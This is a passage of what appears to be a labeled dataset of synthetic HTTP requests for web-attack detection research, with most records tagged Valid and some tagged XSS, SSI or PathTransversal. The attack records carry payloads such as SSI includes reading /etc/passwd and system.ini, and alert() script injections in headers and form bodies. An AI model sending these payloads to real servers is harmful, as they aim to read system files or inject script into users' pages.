MIME-Version: 5.1
Pragma: iodee2i='5sh'
Proxy-Authorization: sdnda be5npAfd=Esnrrha
Authorization: NTLM aWNlanAwbWpzcGplYWl1dGU1cnRoZmhuZGVzNUVBYnJwZG5lZTZmbVRzZW5uaA==
Range: 833-
Referer: http://www.tkCesr7i.ch/fvAs.mpg
TE: chunked;q=0.0
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.9 (compatible; MSIE 5.2; Windows NT; beecrara)
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 818x5674
Via: 4.2 95.239.189.82, eneyo/9.0 181.234.52.117
Transfer-Encoding: gzip
Upgrade: uugt9t/7.7, bihs/8.6, ei8Or/1.6, cnflaa/4.8, 1yu/6.0
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 124.216.57.225
X-Serial-Number: 80684101
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hje9nr7h3zian=1m ]&r5paqsee5en=<style   type   =    " text/javascript     ">[alert  ('jojnssrt0u');]</style>&cT=hl&GpevalbetweenCinsert.tmpr=]ncmgpUfvNte&sYI_Dw5pselect3pi=8434966&cI=rPs6J&CTO45NNPR2J=uvbr ;eooahtpass2=ata e

End - Id: 46787
Start - Id: 35942
class: PathTransversal
GET /ocqOc/a5fbt2erah/ongcloheqegeth/pEaHhfajIi/ouye0nm68eer/da5E1FwPehUXHIIes/oetKrWEQFN.htm?Ktge0Soktu=632209&snu=ih&Re4=n-&ohtqlPn=gemreeutaRseaatele&rmwhnte=edpttauueoe&osctwsn=e5ho&x0o3aAadodalbe=%3C%21--+%23include+virtual%3D%22%2Fetc%2Fpasswd%22+++--%3E&oo1jhioe4=591&ndetcdfrabfd=iet&sxg=ou&clhrrLromie=nunionD HTTP/1.1
Host: 164.40.189.7
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: a6tcaebs-u275jin, xv-dtOvop
Cache-Control: max-stale
Client-ip: 107.17.117.247
Cookie: tyrtZ65s=7;CRJJV42ig=ehem8sinsertxselect$h;sesu=19492;wa=Inhy  fu
Cookie2: $Version="19"
Date: Wed, 26 Sep 07 06:49:38 UTC
ETag: W/"KVz0darYpD@iPYSQ"
Expect: tesEzam
From: niaeaa@eH6xdhht.com
If-Modified-Since: Sat, 15 Aug 09 20:37:58 UTC
If-Unmodified-Since: Fri, 16 Sep 05 06:30:43 GMT
If-Match: "0e_j1lrGtWMXy2JVYV1"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ei6idr"
Authorization: Digest algorithm=m2uoga
Range: -25,5895-
Referer: /Sdre/uwtzeo.dll
TE: trailers,trailers,gzip;q=0.5
Trailer: If-Range
User-Agent: Mozilla/4.6 (Windows; U; Windows NT 1.1; ia-le; rv:1.1.1) Gecko/43492573
UA-CPU: 68000
UA-Disp: 684,759,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 279x705
Via: 1.7 145.24.126.106
Transfer-Encoding: compress
Warning: 334 www.lstanho.png "Hdnhe0hyyoGe34osiao" "Mon, 03 Nov 08 14:09:43 CET"
X-Serial-Number: 2416806
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35942
Start - Id: 3824
class: Valid
GET /fPmKJPwget/Dj0sw/n90so7ei/rmyeho.php?i50nimEt=%25wservicesm&k@idt=539&ZK3jDG=pdN&hf7nl9hinooo=1&Q8bE7=aooNsaSsejsALho1nd&auewi=n%3Dibrncat%5Bea&aeebZ=c%29afinls%3Aeanbinoeevalscf&eitul=h3Pf2rZO HTTP/1.0
Host: www.caoih.st
Connection: keep-alive
Accept: application/*;q=0.8, video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Hjer-ahi;q=0.2, htv-i;q=0.8
Cache-Control: max-age=2
Client-ip: 70.158.123.20
Cookie: pohrhhMtwb=ehastAr;1i6Eudg5cdTdci=like 
Cookie2: $Version="3"
Date: Sun, 28 Feb 10 17:40:08 UTC
ETag: "deLWsSscJgnmluLi1l@4"
Expect: td4n=gehdNs;yeiw=ohnyalrr
From: r0oAr@svheb.cz
If-Modified-Since: Fri, 23 Jul 04 13:03:48 UTC
If-Unmodified-Since: Fri, 10 Jul 09 13:55:08 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 9.7
Pragma: 1oo='fimcndj'
Proxy-Authorization: Basic d3JsbW46d2RzM2FoNXI=
Authorization: NTLM ZGUzZXduN2hrajYzdHNvZXhuYmNzZWxjYUN2dThmbml0ZmFuYw==
Range: 81-,7-,210582-422
Referer: http://www.eahEz.ch/rctigNgw/Issn1e/gaoaneds.jpeg
TE: trailers
Trailer: User-Agent
User-Agent: netuphbonej1rcsr0aL
UA-CPU: 68000
UA-Disp: 203,803,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5647x8744
Via: FTP/9.0 51.73.18.116, FTP/5.2 www.Ognae.jpg, FTP/5.1 www.ehcy.gif:340
Transfer-Encoding: reZrf
Upgrade: tr4e/1.4, ntsu/9.3, heCo/5.1, aaa/5.7, te9o/9.8
Warning: 803 119.71.170.20 "xs6gpt8bmty1" 
X-Forwarded-For: 163.248.155.118
X-Serial-Number: 59223332390585
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3824
Start - Id: 18201
class: Valid
GET /ceouibbth2aw6qrrE/nogzenuoetwex/ea/mxdBDK5tVA@vQ5/tsL/ckiutevtaDsiedo/Xqr/tenreT3bo1ba60tbn1/hNsgrInsreeisatc8wnt.png?hedluwntetro=eboxwnoOttnl&hdct8=1&FnaeT5r=27&jtVT=o0ttTtdosSta&riadaf3eclliicu=Hnjtet9&eepit=98&ShKrteUtEitiuf=eWua7rLw&nxtsdteuCssli=9 HTTP/1.0
Host: 66.52.246.19
Connection: tgowib
Accept: */*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: sdtihti-ofoihoo;q=0.3, uhaR-t
Cache-Control: no-store
Client-ip: 236.7.178.47
Cookie: lsGZRY=97976100;lQjkOB=inputs
Cookie2: $Version="78"
Date: Thu, 03 Jan 08 03:41:56 UTC
ETag: W/"10NDjU36vPCRHiah"
Expect: aaonKjt5=Elnth;oIrtoa0c=y3umpou0
From: oritsj@i639iid.org
If-Modified-Since: Fri, 30 Jan 04 09:20:42 GMT
If-Unmodified-Since: Fri, 22 Jun 07 11:22:09 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 11 Aug 06 16:49:20 CET
Max-Forwards: 4669
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic Zkllc3dPOm5BamV1cg==
Authorization: Digest qop=auth-int
Range: 666465-916
Referer: http://bnga.uk/Alasa/aqiyhtte.msf
TE: deflate,trailers
Trailer: Referer
User-Agent: Mozilla/8.0 (compatible; aerrx6n; Win98; wn83slado; 8feoe8iso)
UA-CPU: StrongARM
UA-Disp: 904,033,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 280x640
Via: HTTP/2.4 128.247.191.44
Transfer-Encoding: compress
Upgrade: hicew/7.4, 1ok/5.7, 4ba/6.1, Inm/8.9, hutr/5.7
Warning: 457 249.243.123.227 "ar3gutfzh" "Thu, 05 Jul 07 12:26:34 GMT"
X-Forwarded-For: 138.19.25.37
X-Serial-Number: 93769188235463446017
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18201
Start - Id: 24686
class: Valid
GET /teiiitlaapxsr0nt/3draotozn/hSMd/scdshetdq/iQggMtk7/tnYvruG0threi/8jMYri2.gif?nnpjbgwinSe2=ek8Px3eUJ4A&jEgsr6=pMkhoI&iaooe=+ib%3F HTTP/1.1
Host: 148.1.200.141
Connection: tanto
Accept: image/*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.0
Cache-Control: min-fresh=33942
Client-ip: 86.24.145.117
Cookie: gEvpthntenet1e=gLD64RVTwtw;nTna=0107;zotlcvuaLhd=3818;8trf0taa=uhtpassevalYrEsmm8;u9khr0pedtt=58
Cookie2: $Version="43"
Date: Tue, 27 Jun 06 14:47:32 CET
ETag: W/"RA93g4f79hQLCowl8Xs"
Expect: u5o62at
From: dsetoca@p0seNgaU4a.de
If-Modified-Since: Sat, 13 Dec 08 24:24:36 UTC
If-Unmodified-Since: Tue, 02 Nov 04 15:03:19 CET
If-Match: "BjVB.lQmRl6l9WtvxE"
If-None-Match: "CG7HTWP2z5BeIPjHyZn5"
If-Range: *
Max-Forwards: 8692
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Basic a2dVdWV3Om5nNmk=
Authorization: Digest algorithm=Assb
Range: 1773-,147343-45947,-7279
Referer: http://es2ecfi.de/1stEnS/tosag/lkeiMoo/klsmaorc.msf
TE: chunked,gzip
Trailer: If-Match
User-Agent: fv0sp/9.5.1
UA-CPU: PowerPC
UA-Disp: 9340,8339,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 089x5784
Via: 5.9 202.158.148.172:9892, 0.6 www.xhkEei7o.tiff:590
Transfer-Encoding: compress
Upgrade: gda/0.6, oNeaDt/1.7, not/8.6, 057tp1/2.2
Warning: 540 44.10.123.96:4 "peien0ehi" 
X-Forwarded-For: 248.154.151.220
X-Serial-Number: 05865096
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 24686
Start - Id: 24481
class: Valid
GET /42O_Zax-_C9TwzOmoCx/9mteHstsewt.bin?epm36tewhjsou=ub0cta&olp=9907510 HTTP/1.0
Host: 127.245.236.63
Connection: close
Accept: application/postscript, text/html;q=0.6, audio/x-wav
Accept-Charset: euc-cn, cp-932
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 249.170.15.166
Cookie: 2rtzoa=trM4z_TM;q1senu=3186639;3tH3ihrerg=5056;xweyn=ntaaunij4syrrq;htey=h4whnlle6l5os
Cookie2: $Version="36"
Date: Sun, 08 May 05 17:26:31 GMT
ETag: W/"Xqj1GCc-txIbUJ71yiWo"
Expect: 100-continue
From: grtsaui@oahrelty.gov
If-Modified-Since: Tue, 25 Apr 06 11:25:49 GMT
If-Unmodified-Since: Sat, 27 Oct 07 15:19:07 GMT
If-Match: "qZocMnvIvANavton-MC"
If-None-Match: "mNM_iQRw1H8P0fKtHbp"
If-Range: Wed, 23 Jun 04 19:40:09 CET
Max-Forwards: 386
MIME-Version: 0.3
Pragma: idnnC=t5Nn
Proxy-Authorization: Basic d25yb2lzaDp0c3RxYjUw
Authorization: Digest realm
Range: -2398,-5
Referer: http://www.mtWsE.cz/otond0/wEuoa/jaMoweMd/ff8b/nEt7.mdb
TE: trailers,trailers
Trailer: Pragma
User-Agent: agopRe1 (s9UqIzu; uVWRrV; nWqjc-M; ij7b5BF@k; 9SjVlDkv10)
UA-CPU: Sparc
UA-Disp: 200,0703,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 302x1499
Via: HTTP/8.7 www.ce9iapd.css:5647, 6.7 185.146.42.92:7734, 8.0 21.81.195.131
Transfer-Encoding: deflate
Upgrade: rdeg/3.6, 4amlzd/2.4, ctceO1/0.6
Warning: 223 214.116.16.145 "vyen6nwlaqe6vllsme" "Thu, 15 Feb 07 01:20:59 CET"
X-Forwarded-For: 213.50.40.93
X-Serial-Number: 280722107
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24481
Start - Id: 28280
class: Valid
GET /ssLOMfvkrIJr/rd@/aJ-JWA/iriz5sdhino6tnm/78z9ZsA/Udh0d8/s0Dt.Cpk6r2Uqto/uaa7sdaeobsincOor.html?0tLl=st&a77=tx.p&ttKshitme=63&wta1eu5th5=8286465984&olsdiyiOHkro8ea=3s-i4j&p9Mcr=kn+esatupdateitkul&2uuieiTceaiatt=tn&pyyidu8sss=07790&enhnp7tcpahcsik=qQ105exMn HTTP/1.1
Host: 124.99.92.92
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: Lnyre-A, Yonblsp-eMHs, ka6-lenpNf;q=0.1, s-a1oaMy;q=0.9, cseLe-i
Cache-Control: ca='lCxet'
Client-ip: 79.12.235.104
Cookie: Laa=619096;PPRtsaccept=bh;h6oiIPle=tSgMZ77gB9A;Tzln0tc8=hfZPZaIA
Cookie2: $Version="767"
Date: Tue, 15 Jun 04 19:17:07 UTC
ETag: "NE29suwvLX-zC.m1Xx"
Expect: 100-continue
From: Elo5h@esedtsi8.net
If-Modified-Since: Sun, 30 Sep 07 13:18:07 CET
If-Unmodified-Since: Sun, 09 Jan 05 04:19:31 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 30 Mar 07 08:13:05 GMT
Max-Forwards: 1096
MIME-Version: 4.5
Pragma: s='t'
Proxy-Authorization: olaif WunoaCa=aerw
Authorization: Basic YUFvaGlnYTpUdXRTaXI=
Range: 3-15771,8-
Referer: /tapan/eio4nUm/ttlotc/i0oslf4a/sn0l.ace
TE: trailers,trailers,gzip;q=0.9
Trailer: Cache-Control
User-Agent: cbedbi (ueDDgd; rWdRKQ; ePlm2QDed3; eW4yXrG; plxmxh)
UA-CPU: Sparc
UA-Disp: 5435,696,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 891x280
Via: FTP/6.9 www.joctTt.png:8247, Aetu2/5.1 141.157.52.92
Transfer-Encoding: gzip
Upgrade: iaRtso/6.7, aakyo/7.1, oash/9.5, mwdp/3.3
Warning: 207 www.iRadateo.png "Hkr6Ecnpnearvdrttm" "Thu, 13 Aug 09 17:46:46 CET"
X-Forwarded-For: 209.67.183.110
X-Serial-Number: 59455788287965152
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 28280
Start - Id: 16373
class: Valid
GET /1mdaf8oesDdqinE/84658Ajam/ej/id/m.BSKasrAqa@TjXB/1qf.htm? HTTP/1.0
Host: 114.96.230.142
Connection: close
Accept: */*
Accept-Charset: euc-cn
Accept-Encoding: deflate;q=0.3, gzip;q=0.5
Accept-Language: *
Cache-Control: dfUmoen=taHnt
Client-ip: 134.255.60.77
Cookie: v2eoaetaatislnE=56098
Cookie2: $Version="6"
Date: Wed, 21 Dec 05 08:37:53 UTC
ETag: W/"dyqfyb@tNwiCjQ.PMST"
Expect: 100-continue
From: 6Inrs@onnmi15ye.gov
If-Modified-Since: Sat, 21 May 05 11:55:21 UTC
If-Unmodified-Since: Mon, 12 Jan 09 17:15:17 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 10 Mar 09 09:49:51 UTC
Max-Forwards: 4
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Basic b2Z5bklpNTpnZnNkRA==
Authorization: Basic ZWxMamVpa2U6d2FhYQ==
Range: -652120,9-,091-
Referer: /v0uaw/dewhlit7/sgyzapo/pteo.txt
TE: chunked;q=0.7,gzip;q=0.0,trailers
Trailer: Expect
User-Agent: Mozilla/3.3 (compatible; ohbrco; Solaris; dhyes)
UA-CPU: MIPS
UA-Disp: 506,7421,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 942x4490
Via: 1.5 www.rs1rthZ.jpeg
Transfer-Encoding: identity
Upgrade: qiOeho/5.5, Hdsx/9.5
Warning: 329 87.131.7.58 "oEshdty0oueiapofites" "Wed, 28 Nov 07 21:16:00 GMT"
X-Forwarded-For: 119.235.122.105
X-Serial-Number: 87401
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16373
Start - Id: 32929
class: Valid
PUT /rdt/weN1Cz.f/.inZ1UYNI/nn@@syQ4.jpg? HTTP/1.1
Content-Length: 140
Content-Language: jua,e
Content-Encoding: identity
Content-Location: http://www.t6ec4s.uk/nESe.gif
Content-MD5: ZWhoaGxoY3luN2lIYXZpcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Jan 06 04:54:16 CET
Last-Modified: Thu, 14 Sep 06 08:00:12 UTC
Host: www.ntYeeru.net:29703
Connection: keep-alive
Accept: application/*, audio/basic;q=0.8
Accept-Charset: x-mac-icelandic;q=0.8, cp-950;q=0.3, ks_c_5601-1987;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: mee9de='ess'
Client-ip: 218.83.76.125
Cookie: jebthjO=Tae co7laDngeyr7homs;N7tcetnnfhhk13=aZEqpsp2tyY;actwadeurLpgIHe=1874;iPbscripto=6768327792
Cookie2: $Version="73"
Date: Thu, 01 Mar 07 09:56:04 CET
ETag: "0@CY0H.LM9MHonM4_Mj"
Expect: 100-continue
From: cpts@U3ei.ch
If-Modified-Since: Sat, 14 Mar 09 15:01:39 UTC
If-Unmodified-Since: Sun, 29 Feb 04 09:54:17 CET
If-Match: *
If-None-Match: "vYLRXbyP3PPcXdnu1"
If-Range: Wed, 23 Sep 09 22:34:53 CET
Max-Forwards: 308
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest response="a9BeE916BeBcFf88ab7Fa90c49BcFa2D"
Authorization: 7mno 3Rtsa=engedaw
Range: 5534-4
Referer: http://www.uc4nhmta.be/Saaeg/wfgfiez.bin
TE: trailers,chunked,chunked;q=0.4
Trailer: From
User-Agent: uskatiwt (hx3s-Vb; nnw-1O41J; lZzcz._KJb; hNphd4K)
UA-CPU: 68000
UA-Disp: 6130,7497,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6323x133
Via: 6.5 www.hso29t.gif, 9.9 www.reomHY.gif:42839
Transfer-Encoding: gzip
Upgrade: 6kra/2.6, aeln/1.8, nmsoir/6.4
Warning: 042 55.252.234.189 "mLniet61zeaoq" "Tue, 18 Nov 08 09:37:46 UTC"
X-Forwarded-For: 96.92.231.105
X-Serial-Number: 9424795318731679930
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

insertMO05Cuux=rtconnectoexerbe+nntjut&prs5hto=18621116&ooRACWkTS=lGC29lIqH&zkR=3m.@b3&rxejeyt3dLyg=33207982&eqibma=2egs&te4=4&pt=?ces

End - Id: 32929
Start - Id: 23051
class: Valid
GET /rp8hE.php4?tGp2=5557&ihihieif=9&aeecsnt6itLtrJ=s&uqjeoskpthes=tOimgwofof%3Fj5ua&irH4aapO2toos=D HTTP/1.0
Host: 213.134.179.61
Connection: close
Accept: */*;q=0.0
Accept-Charset: shift_jis;q=0.5, iso-8859-1;q=0.9, euc-jp;q=0.8, big5
Accept-Encoding: deflate;q=0.5
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 56.180.36.208
Cookie: eVusceauimcls=9019
Cookie2: $Version="511"
Date: Sun, 15 Jun 08 10:05:24 UTC
ETag: "iUQNh7HUfqHYiGX"
Expect: 100-continue
From: sAahmw9m@oemr3xo.uk
If-Modified-Since: Thu, 18 Nov 04 06:29:45 UTC
If-Unmodified-Since: Sun, 31 May 09 03:20:26 CET
If-Match: "xaTBOO.oV0E6ERTS"
If-None-Match: "uw-YdA.YTxd2H_5BbZV"
If-Range: Sun, 21 Jan 07 17:52:21 CET
Max-Forwards: 3286
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: aeTei e5umtiha=e96omtou
Authorization: NTLM cjFtQm1jRDRlZWJmYjdvc2hydGxpOWV2YVFiZXhzaHRlcnRuN2Y3ZG9jdw==
Range: -41
Referer: /hmhtOr.jsp
TE: chunked;q=0.7,chunked,trailers
Trailer: Authorization
User-Agent: Mozilla/8.8 (Windows; U; Windows NT 9.6; 13-pp; rv:8.7.6) Gecko/77005551
UA-CPU: x86
UA-Disp: 8779,521,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6076x9120
Via: 7.0 www.Ewny.htm, HTTP/3.0 www.sr5e.htm, HTTP/7.4 www.tdmuh.gif
Transfer-Encoding: deflate
Upgrade: ioeet/0.5, uiae/3.4
Warning: 007 www.oobensO.tiff "sn6eP" 
X-Forwarded-For: 239.44.113.150
X-Serial-Number: 103102
----: -----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 23051
Start - Id: 34378
class: Valid
POST /dyC9l1ZkC4eQoh/ld0-VbW/idg5iWey/eofAitdeshfteeoH/feM.jpeg? HTTP/1.1
Content-Length: 276
Content-Language: ibome
Content-Encoding: gzip
Content-Location: /xnPonhl/nk4ewe/a3tTan/FTbo/otrtri.gif
Content-MD5: bjF1ZW1jaG9vTG9pY2VlZg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 29 Oct 06 02:04:48 UTC
Last-Modified: Fri, 22 Feb 08 14:05:27 UTC
Host: www.tAwasZ7v.biz
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 35.136.246.12
Cookie: i3=O$i
Cookie2: $Version="17"
Date: Tue, 21 Apr 09 19:51:58 GMT
ETag: W/"6Rm09ljEsGbGNP0llG"
Expect: coehc
From: arred@puor.be
If-Modified-Since: Wed, 24 Jun 09 01:34:10 UTC
If-Unmodified-Since: Tue, 15 Feb 05 20:40:27 UTC
If-Match: *
If-None-Match: *
If-Range: "LkADf3r0a7Q0yMo"
Max-Forwards: 71
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: NTLM c29vb2ZTUGlmbWw0YWlvZXNIaG90YUhkb2phaW8ybTBVd2FjaQ==
Authorization: inyy gl5t=goed
Range: 4-
Referer: /6tica.conf
TE: trailers
Trailer: Via
User-Agent: Puyise (tsTvie9g)
UA-CPU: x86
UA-Disp: 404,187,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 015x732
Via: elvh/2.1 www.ifoE.js, 9.2 7.170.20.51:210
Transfer-Encoding: deflate
Upgrade: aa8el/9.2, rti/4.8, dpEae/4.2
Warning: 736 165.136.197.147 "ob0aohssh7zt" 
X-Forwarded-For: 107.108.232.99
X-Serial-Number: 71981796445551996576
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~

ii=244138&UDxtermQTLUHb=edocument8A)eifs$i&staecdo=amA3&sa=161935&OSl9Vs7as=encilindu&uifjoeso=onnsb&mtiii=xp_oiI:tmpnevalSdeleteomwachild&Eemiswi8to4a=he&smHryEnu=t1D&ochqtrr=lf40sEsmlBrrtsno&ZMSD=ld-nvc&etntbmwehtcc=2tsy&re6averm=31844&ee9anepahktt=herwidupdateXi3drar

End - Id: 34378
Start - Id: 28288
class: Valid
GET /oaetgatmZ9ba/CsystemWcopyu5metaahomeS/Tinxobjectscript/lOinanNoumsfe/rieroanaiNtshei/jco3S1NthdnnYeodae/7VoMBaNa.php3?smhoitf=fqu8l8 HTTP/1.0
Host: www.msmiv22t.org
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.0
Cache-Control: max-stale=07661
Client-ip: 79.12.235.104
Cookie: Laa=619096;PPRtsaccept=bh;h6oiIPle=tSgMZ77gB9A;Tzln0tc8=hfZPZaIA
Cookie2: $Version="911"
Date: Fri, 21 Nov 08 23:40:27 GMT
ETag: W/"8Fd9EHTVSWp@LX6ZdoN"
Expect: 100-continue
From: gqa2iem@eozdtnpr.cz
If-Modified-Since: Sat, 24 Jan 04 02:10:34 GMT
If-Unmodified-Since: Fri, 29 Dec 06 06:01:41 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 23 Jan 08 04:19:53 UTC
Max-Forwards: 01
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: olaif WunoaCa=aerw
Authorization: Digest uri=/hhxnpi/vheans.mspx
Range: 929-162
Referer: /aerlvi0/Utcsjioo/emury.swf
TE: trailers,trailers,gzip;q=0.9
Trailer: Accept-Charset
User-Agent: Mozilla/5.2 (Windows; U; WinNT 4.7; Ao-nt; rv:3.1.1) Gecko/38066893
UA-CPU: Sparc
UA-Disp: 5435,696,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7134x450
Via: 0.3 73.193.123.158
Transfer-Encoding: nsoeti; Nsdatl=e98a
Upgrade: iaRtso/6.7, aakyo/7.1, oash/9.5, mwdp/3.3
Warning: 207 www.iRadateo.png "Hkr6Ecnpnearvdrttm" "Thu, 13 Aug 09 17:46:46 CET"
X-Forwarded-For: 253.233.231.18
X-Serial-Number: 3984354
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 28288
Start - Id: 48195
class: XSS
PUT /o_/IformWwM4QsnY/0hnedmtcnvkol/wzrw4swiresCjsazsn/wWzg3UDmi_QucZ.jpeg? HTTP/1.0
Content-Length: 286
Content-Language: m0egx
Content-Encoding: identity
Content-Location: http://ahbTi.cz/9rsee/Slrorr.ace
Content-MD5: ZXNibnRwb2hhbnRMTjZueQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Jan 08 18:52:02 CET
Last-Modified: Sun, 26 Dec 04 07:33:44 UTC
Host: 86.122.166.177
Connection: nEe1r
Accept: application/rtf, audio/x-wav;q=0.6, image/*
Accept-Charset: shift_jis;q=0.2, windows-1253, iso-8859-8;q=0.1, x-mac-japanese
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=16133
Client-ip: 81.237.68.72
Cookie: t8oeabdlejctt=-n;mltWtnj=)1|iymo\perlwsm|esa;8ces=wcuGV_cMjGz;hsoL=e\Aan
Cookie2: $Version="55"
Date: Fri, 01 Oct 04 22:42:58 GMT
ETag: W/"Jexh6JUi9RPoL60oN"
Expect: 100-continue
From: yeonrndi@ndape.biz
If-Modified-Since: Fri, 09 May 08 02:45:49 GMT
If-Unmodified-Since: Sun, 24 Jul 05 03:33:33 GMT
If-Match: *
If-None-Match: "JSRZ379HsDppnyV4"
If-Range: "coK1E4GT6kjLswWa"
Max-Forwards: 465
MIME-Version: 4.6
Pragma: m6Dtnaw='ie8eAi'
Authorization: NTLM Z2FJaTZueWx3cm5jZWV0aXQ4ZXRMbmFweWl1c0Rpdm5zeHg=
Referer: http://www.4tzj.st/sfipv/cYwai/zb5Bsydt.htm
TE: trailers,trailers
Trailer: If-Match
User-Agent: <input    type  =  "     image     "   dynsrc   = " javascript:   [alert  ('lhj3tee');]">
UA-OS: FreeBSD
UA-Pixels: 9098x7703
Via: FTP/1.6 www.tvctldon.gif:00652
Transfer-Encoding: deflate
Warning: 376 www.tr4on.jpeg "m7aaREuTTovptbolar" 
X-Forwarded-For: 251.96.98.120
X-Serial-Number: 340888141293
----: -------------

6lgNi0i06=0779&ntt=isL&LtaodHnftnnrtea=e ioGlnph-nrmreplacekEupositiono&gsCbnullperl=u8.y&hoets=9XqlarSntil&locPnrdlnnA=mtevcE25boot.iniawn&qTWlVzRHcwtx=crLYEEPp&dlen0teA=0887742&og6u=2678&bYli=iZ_vJedlRvF&0vNoe_=88380&1wsu0e0ta=autoexect7&bSet0Deljuouago=50218&aepgpe= 9hceinph-]eipl

End - Id: 48195
Start - Id: 40475
class: SSI
GET /nicKq/Nzqeint/autoexec-6Ut6w5Tt/tireziih6kdtoahor/nrS08PR/28JB7JisyWBpIk/n0/eosaufmi9izutiie/XVU.php3?ngresamgir=mb&zlam1xj7tha1se=67923246&8Zsr=%25%7C&t3lth0medetTra=uhnNwnieC&cnvorsgcftq=r+ht1iargroup+by+r+h+%3Ck%5DY&3aeiomnaloBe=318061786&psQporE=9719689&tI-r9positionua=88744&s7oieta=nsq+t+etre&yiN=%3C%21--++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E&ySht7=iW_d HTTP/1.1
Host: www.kcsahlEoe.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 207.160.226.22
Cookie: 7poRla56si=88277634
Cookie2: $Version="386"
Date: Sat, 14 Apr 07 06:52:53 UTC
ETag: "9HIuSgRtubV.qwABchz"
Expect: 100-continue
From: Yma7@5eefcOthto.biz
If-Modified-Since: Thu, 11 Sep 08 23:39:01 CET
If-Unmodified-Since: Mon, 25 Apr 05 21:29:03 CET
If-Match: "YYnZmA1wQSwgbXhJ5L"
If-None-Match: "9FKU8u_.GqW6Spnj"
If-Range: *
Max-Forwards: 91
MIME-Version: 6.5
Pragma: g5iEicoe='fj'
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: oqe28t tMiztat9=1u0r
Range: 6740-758,0802-
Referer: /jdo3qi8s/tlmhvs/9i9ddhvF.htm
TE: trailers,chunked,trailers
Trailer: Host
User-Agent: eltv/8.2.5
UA-CPU: PowerPC
UA-Disp: 0480,927,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 623x2416
Via: 7.7 120.165.158.146, 0.3 www.ots2g.js, uhhihe/4.2 www.ngtquefi.css:2
Transfer-Encoding: deflate
Upgrade: saq/8.2, 7weze/1.4, ooi/9.7, onEhrR/5.6, ae02/3.2
Warning: 565 www.mo1i.jpg "difinztedvtd" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 98565372421828
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40475
Start - Id: 33304
class: Valid
POST /sxWt@@.htm? HTTP/1.0
Content-Length: 205
Content-Language: wU
Content-Encoding: gzip
Content-Location: /eAnw.cgi
Content-MD5: c29FaHNoYXlMcWZvbE5Ubg==
Content-Type: application/x-www-form-urlencoded
